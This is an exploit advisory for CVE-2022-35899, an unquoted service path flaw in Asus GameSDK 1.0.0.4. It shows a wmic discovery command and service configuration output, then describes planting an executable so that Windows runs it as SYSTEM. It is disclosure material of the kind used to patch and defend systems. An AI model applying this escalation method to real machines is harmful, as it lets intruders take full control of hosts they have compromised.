Asus GameSDK 1.0.0.4 Unquoted Service Path

# Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path (Privilege Escalation)# Date: 07/14/2022# Exploit Author: Angelo Pio Amirante# Version: 1.0.0.4# Tested on: Windows 10# Patched version: 1.0.5.0# CVE: CVE-2022-35899# Step to discover the unquoted service path:wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """# Info on the service:C:\>sc qc "GameSDK Service"[SC] QueryServiceConfig OPERAZIONI RIUSCITENOME_SERVIZIO: GameSDK Service        TIPO                      : 10  WIN32_OWN_PROCESS        TIPO_AVVIO                : 2   AUTO_START        CONTROLLO_ERRORE          : 1   NORMAL        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe        GRUPPO_ORDINE_CARICAMENTO :        TAG                       : 0        NOME_VISUALIZZATO         : GameSDK Service        DIPENDENZE                :        SERVICE_START_NAME : LocalSystem# ExploitIf an attacker had already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS\" folder or in "C:\" , he could place his own "Program.exe" or "GameSDK.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "GameSDK.exe".# ImpactAn attacker can elevate his privileges on the system and become NTAUTHORITY\SYSTEM.# Poc Videohttps://youtu.be/u_8JMIgn-5g